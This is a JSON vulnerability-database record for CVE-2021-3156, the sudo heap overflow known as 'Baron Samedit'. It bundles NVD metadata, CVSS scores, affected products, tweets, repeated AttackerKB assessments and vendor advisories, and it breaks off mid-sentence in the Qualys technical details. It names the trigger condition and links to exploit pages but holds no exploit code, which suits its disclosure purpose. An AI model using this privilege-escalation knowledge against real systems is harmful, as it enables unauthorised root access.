{"id": "CVE-2021-3156", "bulletinFamily": "NVD", "title": "CVE-2021-3156", "description": "Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \"sudoedit -s\" and a command-line argument that ends with a single backslash character.", "published": "2021-01-26T21:15:00", "modified": "2021-02-23T18:15:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3156", "reporter": "cve@mitre.org", "references": ["http://www.openwall.com/lists/oss-security/2021/01/27/1", "https://security.gentoo.org/glsa/202101-33", "http://seclists.org/fulldisclosure/2021/Jan/79", "http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html", "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html", "https://www.sudo.ws/stable.html#1.9.5p2", "https://www.debian.org/security/2021/dsa-4839", "http://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html", "http://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html", "http://seclists.org/fulldisclosure/2021/Feb/42", "https://www.beyondtrust.com/blog/entry/security-advisory-privilege-management-for-unix-linux-pmul-basic-and-privilege-management-for-mac-pmm-affected-by-sudo-vulnerability", "http://www.openwall.com/lists/oss-security/2021/01/27/2", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/", "https://support.apple.com/kb/HT212177", "http://www.openwall.com/lists/oss-security/2021/02/15/1", "https://kc.mcafee.com/corporate/index?page=content&id=SB10348", "http://www.openwall.com/lists/oss-security/2021/01/26/3", "https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html", "https://www.openwall.com/lists/oss-security/2021/01/26/3", "https://www.synology.com/security/advisory/Synology_SA_21_02", "https://www.kb.cert.org/vuls/id/794544", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LHXK6ICO5AYLGFK2TAX5MZKUXTUKWOJY/", "https://security.netapp.com/advisory/ntap-20210128-0002/", "https://security.netapp.com/advisory/ntap-20210128-0001/", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM"], "cvelist": ["CVE-2021-3156"], "type": "cve", "lastseen": "2021-02-25T14:59:41", "edition": 15, "viewCount": 337, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:67AA97AC-E920-4D0C-9B50-6B1C42E683D1"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-3156"]}, {"type": "cisa", "idList": ["CISA:765265E5BF9328E9BAF09F93A1684580"]}, {"type": "cloudlinux", "idList": ["CLSA-2021:1611743864"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:A341C9278C6DD389E0F263AE83CB5579"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B7BFF90DF2218C3CFB5ABB1CFE63700E", "RAPID7BLOG:BCCD03F6B72FD7F9410FC063D6F16682", "RAPID7BLOG:8F65784C67333FC453D98DBB9FBEBA4C"]}, {"type": "virtuozzo", "idList": ["VZA-2021-004", "VZA-2021-005"]}, {"type": "amazon", "idList": ["ALAS-2021-1478", "ALAS2-2021-1590"]}, {"type": "redhat", "idList": ["RHSA-2021:0219", "RHSA-2021:0223", "RHSA-2021:0220", "RHSA-2021:0225", "RHSA-2021:0226", "RHSA-2021:0221", "RHSA-2021:0218", "RHSA-2021:0222", "RHSA-2021:0224", "RHSA-2021:0227"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-9019", "ELSA-2021-0221", "ELSA-2021-0218"]}, {"type": "slackware", "idList": ["SSA-2021-026-01"]}, {"type": "cisco", "idList": ["CISCO-SA-SUDO-PRIVESC-JAN2021-QNYQFCM"]}, {"type": "nessus", "idList": ["FEDORA_2021-2CB63D912A.NASL", "REDHAT-RHSA-2021-0219.NASL", "ORACLELINUX_ELSA-2021-0218.NASL", "ORACLEVM_OVMSA-2021-0003.NASL", "PHOTONOS_PHSA-2021-1_0-0358_SUDO.NASL", "REDHAT-RHSA-2021-0225.NASL", "ORACLELINUX_ELSA-2021-0221.NASL", "REDHAT-RHSA-2021-0220.NASL", "EULEROS_SA-2021-1366.NASL", "REDHAT-RHSA-2021-0226.NASL"]}, {"type": "cert", "idList": ["VU:794544"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161270", "PACKETSTORM:161293", "PACKETSTORM:161230", "PACKETSTORM:161160"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4839-1:0839A", "DEBIAN:DLA-2534-1:AA5E2"]}, {"type": "threatpost", "idList": ["THREATPOST:3A6A7F7256BF05AA048512CF2D064F7F"]}, {"type": "ubuntu", "idList": ["USN-4705-2", "USN-4705-1"]}, {"type": "fedora", "idList": ["FEDORA:353D73154ABE", "FEDORA:60E3A30D1484"]}, {"type": "exploitdb", "idList": ["EDB-ID:49522", "EDB-ID:49521"]}, {"type": "centos", "idList": ["CESA-2021:0221"]}, {"type": "freebsd", "idList": ["F3CF4B33-6013-11EB-9A0E-206A8A720317"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:E2EC45D69AA3550DE981BAC4E63015D3"]}, {"type": "archlinux", "idList": ["ASA-202101-25"]}, {"type": "thn", "idList": ["THN:AF0CBD71A7E1DCE8E508D374E0760687"]}, {"type": "apple", "idList": ["APPLE:103D4315273A04D52814811704A34580", "APPLE:HT212177"]}, {"type": "gentoo", "idList": ["GLSA-202101-33"]}], "modified": "2021-02-25T14:59:41", "rev": 2}, "score": {"value": 4.8, "vector": "NONE", "modified": "2021-02-25T14:59:41", "rev": 2}, "twitter": {"counter": 738, "tweets": [{"link": "https://twitter.com/1337in/status/1364741768151932935", "text": "Need r00t w00t on a box?\nWithout searching for it?\nHodl my beer!!\n\nCVE-2021-3156 \"Baron Samedit\"\n\nSudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \u201csudoedit -s\u201d and a command-line argument that ends with a single backslash character."}, {"link": "https://twitter.com/haisenb3rg/status/1364448268751679490", "text": "Baron Samedit - I have just completed this room! Check it out: https://t.co/mfRK5faoBG?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/SudoVulns?src=hashtag_click /hashtag/CVE?src=hashtag_click-2021-3156 /hashtag/Sudo?src=hashtag_click /hashtag/Beginner?src=hashtag_click /hashtag/Tutorial?src=hashtag_click /hashtag/Vulnerability?src=hashtag_click /hashtag/Heap?src=hashtag_click /hashtag/Buffer?src=hashtag_click Overflow /hashtag/BoF?src=hashtag_click /hashtag/sudovulnssamedit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Parasoft/status/1364316032790376449", "text": "Analyze the CVE-2021-3156 heap overflow vulnerability in sudo. Here are step-by-step instructions using Parasoft Insure++. /hashtag/softwaredevelopment?src=hashtag_click /hashtag/BaronSamedit?src=hashtag_click\nhttps://t.co/P5LYoWtO4s?amp=1"}, {"link": "https://twitter.com/GrupoICA_Ciber/status/1364499067015946240", "text": "DEBIAN\nM\u00faltiples vulnerabilidades de severidad alta en productos DEBIAN: \n\nCVE-2021-3156,CVE-2020-35965\n\nM\u00e1s info en: https://t.co/6q3tOOb8KA?amp=1\n/hashtag/ciberseguridad?src=hashtag_click /hashtag/grupoica?src=hashtag_click /hashtag/debian?src=hashtag_click"}, {"link": "https://twitter.com/zevwatts/status/1362748310860271616", "text": "Make sure to update sudo to the latest patch with fix for CVE-2021-3156 when running any Linux distro, including MacOS, and BSD."}, {"link": "https://twitter.com/ryo_hisano/status/1362385116169785348", "text": "sudo\u306e\u8106\u5f31\u6027\u60c5\u5831(Important: CVE-2021-3156 : Baron Samedi) - https://t.co/LZoSyqGEkw?amp=1"}, {"link": "https://twitter.com/yo_ta_n/status/1362550686878101508", "text": "CVE-2021-3156\u306e\u5bfe\u5fdc\u5b8c\u4e86"}, {"link": "https://twitter.com/AlmalikiSheikha/status/1362696671772233741", "text": "CVE-2021-3156 /hashtag/sudo?src=hashtag_click"}, {"link": "https://twitter.com/0x6d6e647a/status/1364409828425093125", "text": "Check out my short blog post discussing memory analysis of the /hashtag/BaronSamedit?src=hashtag_click vulnerability in /hashtag/sudo?src=hashtag_click /hashtag/CVE?src=hashtag_click-2021-3156."}, {"link": "https://twitter.com/RobertSchrader/status/1364947017806585861", "text": "Recently, a critical flaw in Linux SUDO was discovered and is being tracked as CVE-2021-3156. More disturbing is the fact that researchers determined the Sudo privilege escalation also impacts the latest version of macOS, Big Sur 11.2.\n\n/hashtag/BaronSamedit?src=hashtag_click"}], "modified": "2021-02-25T14:59:41"}, "vulnersScore": 4.8}, "cpe": ["cpe:/a:mcafee:web_gateway:10.0.4", "cpe:/a:netapp:oncommand_unified_manager_core_package:-", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:netapp:hci_management_node:-", "cpe:/a:sudo_project:sudo:1.9.5", "cpe:/a:mcafee:web_gateway:9.2.8", "cpe:/o:fedoraproject:fedora:32", "cpe:/a:netapp:solidfire:-", "cpe:/o:fedoraproject:fedora:33", "cpe:/a:mcafee:web_gateway:8.2.17"], "affectedSoftware": [{"cpeName": "mcafee:web_gateway", "name": "mcafee web gateway", "operator": "eq", "version": "9.2.8"}, {"cpeName": "sudo_project:sudo", "name": "sudo project sudo", "operator": "lt", "version": "1.9.5"}, {"cpeName": "netapp:oncommand_unified_manager_core_package", "name": "netapp oncommand unified manager core package", "operator": "eq", "version": "-"}, {"cpeName": "mcafee:web_gateway", "name": "mcafee web gateway", "operator": "eq", "version": "10.0.4"}, {"cpeName": "fedoraproject:fedora", "name": "fedoraproject fedora", "operator": "eq", "version": "33"}, {"cpeName": "netapp:solidfire", "name": "netapp solidfire", "operator": "eq", "version": "-"}, {"cpeName": "debian:debian_linux", "name": "debian debian linux", "operator": "eq", "version": "10.0"}, {"cpeName": "fedoraproject:fedora", "name": "fedoraproject fedora", "operator": "eq", "version": "32"}, {"cpeName": "sudo_project:sudo", "name": "sudo project sudo", "operator": "eq", "version": "1.9.5"}, {"cpeName": "mcafee:web_gateway", "name": "mcafee web gateway", "operator": "eq", "version": "8.2.17"}, {"cpeName": "netapp:hci_management_node", "name": "netapp hci management node", "operator": "eq", "version": "-"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:mcafee:web_gateway:8.2.17:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:mcafee:web_gateway:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:mcafee:web_gateway:9.2.8:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:sudo_project:sudo:1.9.5:patch1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:sudo_project:sudo:1.9.5:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.5", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager_core_package:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:a:sudo_project:sudo:1.9.5:patch1:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager_core_package:-:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:web_gateway:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:web_gateway:8.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:web_gateway:9.2.8:*:*:*:*:*:*:*"], "cwe": ["CWE-787"], "scheme": null, "extraReferences": [{"name": "https://www.sudo.ws/stable.html#1.9.5p2", "refsource": "CONFIRM", "tags": ["Release Notes", "Vendor Advisory"], "url": "https://www.sudo.ws/stable.html#1.9.5p2"}, {"name": "https://www.beyondtrust.com/blog/entry/security-advisory-privilege-management-for-unix-linux-pmul-basic-and-privilege-management-for-mac-pmm-affected-by-sudo-vulnerability", "refsource": "MISC", "tags": [], "url": "https://www.beyondtrust.com/blog/entry/security-advisory-privilege-management-for-unix-linux-pmul-basic-and-privilege-management-for-mac-pmm-affected-by-sudo-vulnerability"}, {"name": "[debian-lts-announce] 20210126 [SECURITY] [DLA 2534-1] sudo security update", "refsource": "MLIST", "tags": [], "url": "https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html"}, {"name": "http://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html"}, {"name": "DSA-4839", "refsource": "DEBIAN", "tags": ["Third Party Advisory"], "url": "https://www.debian.org/security/2021/dsa-4839"}, {"name": "FEDORA-2021-2cb63d912a", "refsource": "FEDORA", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LHXK6ICO5AYLGFK2TAX5MZKUXTUKWOJY/"}, {"name": "[oss-security] 20210127 Re: Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List"], "url": "http://www.openwall.com/lists/oss-security/2021/01/27/1"}, {"name": "[oss-security] 20210126 Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://www.openwall.com/lists/oss-security/2021/01/26/3"}, {"name": "http://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html"}, {"name": "GLSA-202101-33", "refsource": "GENTOO", "tags": ["Third Party Advisory"], "url": "https://security.gentoo.org/glsa/202101-33"}, {"name": "https://support.apple.com/kb/HT212177", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://support.apple.com/kb/HT212177"}, {"name": "20210126 Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "FULLDISC", "tags": [], "url": "http://seclists.org/fulldisclosure/2021/Jan/79"}, {"name": "20210129 Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021", "refsource": "CISCO", "tags": ["Third Party Advisory"], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM"}, {"name": "VU#794544", "refsource": "CERT-VN", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://www.kb.cert.org/vuls/id/794544"}, {"name": "[oss-security] 20210127 Re: Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List"], "url": "http://www.openwall.com/lists/oss-security/2021/01/27/2"}, {"name": "https://security.netapp.com/advisory/ntap-20210128-0001/", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://security.netapp.com/advisory/ntap-20210128-0001/"}, {"name": "https://security.netapp.com/advisory/ntap-20210128-0002/", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://security.netapp.com/advisory/ntap-20210128-0002/"}, {"name": "20210211 APPLE-SA-2021-02-09-1 macOS Big Sur 11.2.1, macOS Catalina 10.15.7 Supplemental Update, and macOS Mojave 10.14.6 Security Update 2021-002", "refsource": "FULLDISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "http://seclists.org/fulldisclosure/2021/Feb/42"}, {"name": "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html"}, {"name": "https://www.synology.com/security/advisory/Synology_SA_21_02", "refsource": "CONFIRM", "tags": [], "url": "https://www.synology.com/security/advisory/Synology_SA_21_02"}, {"name": "https://www.openwall.com/lists/oss-security/2021/01/26/3", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "https://www.openwall.com/lists/oss-security/2021/01/26/3"}, {"name": "https://kc.mcafee.com/corporate/index?page=content&id=SB10348", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://kc.mcafee.com/corporate/index?page=content&id=SB10348"}, {"name": "FEDORA-2021-8840cbdccd", "refsource": "FEDORA", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/"}, {"name": "[oss-security] 20210215 Re: sudo: Ineffective NO_ROOT_MAILER and Baron Samedit", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://www.openwall.com/lists/oss-security/2021/02/15/1"}, {"name": "http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html"}]}

{"attackerkb": [{"lastseen": "2021-02-23T21:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \u201csudoedit -s\u201d and a command-line argument that ends with a single backslash character.\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at January 27, 2021 3:40pm UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**MadDud** at January 30, 2021 9:59am UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**dorpor412** at January 27, 2021 8:10am UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**marshalcn** at January 27, 2021 6:16am UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2\n", "modified": "2021-02-05T00:00:00", "published": "2021-01-26T00:00:00", "id": "AKB:67AA97AC-E920-4D0C-9B50-6B1C42E683D1", "href": "https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit", "type": "attackerkb", "title": "CVE-2021-3156 \"Baron Samedit\"", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2021-02-10T21:38:44", "bulletinFamily": "software", "cvelist": ["CVE-2021-3156"], "description": "Palo Alto Networks Product Security Assurance team has evaluated the Sudo software vulnerability CVE-2021-3156.\n\nPAN-OS software, Prisma Cloud compute, and CloudGenix devices do not include the Sudo program and, therefore, no scenarios required for successful exploitation exist in these Palo Alto Networks products.\n\n**Work around:**\nNo work around available.", "edition": 1, "modified": "2021-02-10T17:00:00", "published": "2021-02-10T17:00:00", "id": "PA-CVE-2021-3156", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2021-3156", "title": "Informational: Impact of Sudo Vulnerability CVE-2021-3156", "type": "paloalto", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:37", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "Sudo has released an advisory addressing a heap-based buffer overflow vulnerability\u2014CVE-2021-3156\u2014affecting sudo legacy versions 1.8.2 through 1.8.31p2 and stable versions 1.9.0 through 1.9.5p1. Sudo is a utility included in many Unix- and Linux-based operating systems that allows a user to run programs with the security privileges of another user. An attacker could exploit this vulnerability to take control of an affected system.\n\nCISA encourages users and administrators to update to sudo version 1.9.5p2, refer to vendors for available patches, and review the following resources for additional information.\n\n * [Sudo Advisory](<https://www.sudo.ws/alerts/unescape_overflow.html>)\n * [Qualys Blog](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>)\n * [CERT Coordination Center Vulnerability Note VU#794544](<https://kb.cert.org/vuls/id/794544>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/02/sudo-heap-based-buffer-overflow-vulnerability-cve-2021-3156>); we'd welcome your feedback.\n", "modified": "2021-02-04T00:00:00", "published": "2021-02-02T00:00:00", "id": "CISA:765265E5BF9328E9BAF09F93A1684580", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/02/sudo-heap-based-buffer-overflow-vulnerability-cve-2021-3156", "type": "cisa", "title": "Sudo Heap-Based Buffer Overflow Vulnerability \u2014 CVE-2021-3156", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudlinux": [{"lastseen": "2021-02-04T13:26:22", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "Fix CVE-2021-3156: Heap-based buffer overflow in sudo.", "modified": "2027-01-27T12:30:00", "published": "2021-01-27T12:30:00", "id": "CLSA-2021:1611743864", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "type": "cloudlinux", "title": "Fix CVE-2021-3156: Heap-based buffer overflow in sudo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-02-04T13:21:57", "bulletinFamily": "blog", "cvelist": ["CVE-2021-3156"], "description": "**Update Feb 3, 2021**: It [has been reported](<https://twitter.com/hackerfantastic/status/1356645638151303169>) that macOS, AIX, and \nSolaris are also vulnerable to CVE-2021-3156, and that others may also \nstill be vulnerable. Qualys has not independently verified the exploit.\n\n**Original Post**: The Qualys Research Team has discovered a heap overflow vulnerability in sudo, a near-ubiquitous utility available on major Unix-like operating systems. Any unprivileged user can gain root privileges on a vulnerable host using a default sudo configuration by exploiting this vulnerability.\n\nSudo is a powerful utility that\u2019s included in most if not all Unix- and Linux-based OSes. It allows users to run programs with the security privileges of another user. The vulnerability itself has been hiding in plain sight for nearly 10 years. It was introduced in July 2011 (commit 8255ed69) and affects all legacy versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1 in their default configuration.\n\nSuccessful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and distributions are also likely to be exploitable.\n\nAs soon as the Qualys research team confirmed the vulnerability, Qualys engaged in responsible vulnerability disclosure and coordinated with sudo\u2019s author and open source distributions to announce the vulnerability.\n\n### Disclosure Timeline\n\n * 2021-01-13: Advisory sent to Todd.Miller@sudo\n * 2021-01-19: Advisory and patches sent to distros@openwall\n * 2021-01-26: Coordinated Release Date (6:00 PM UTC)\n\n### Proof of Concept Video \n\n### Technical Details\n\nIf Sudo is executed to run a command in &quot;shell&quot; mode (shell -c command):\n\n * either through the -s option, which sets 